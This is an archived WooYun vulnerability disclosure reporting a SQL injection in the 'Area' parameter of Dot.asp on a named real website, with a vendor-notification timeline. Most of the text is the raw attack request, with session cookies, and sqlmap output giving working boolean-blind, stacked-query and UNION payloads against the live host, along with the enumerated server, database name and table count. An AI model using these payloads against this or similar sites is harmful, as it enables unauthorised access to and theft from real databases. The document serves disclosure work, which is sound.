WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
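2016-01-23: Details reported to the vendor; awaiting vendor response
2016-01-24: Vendor confirmed; details disclosed to the vendor only
2016-02-03: Details disclosed to core white hats and experts in related fields
2016-02-13: Details disclosed to regular white hats
2016-02-23: Details disclosed to intern white hats
2016-03-08: Details disclosed to the public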

GET /Dot.asp?Area=-1' OR 1=1* -- HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- --

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- --
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]

Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2016-01-24 13:51
Thanks
None yet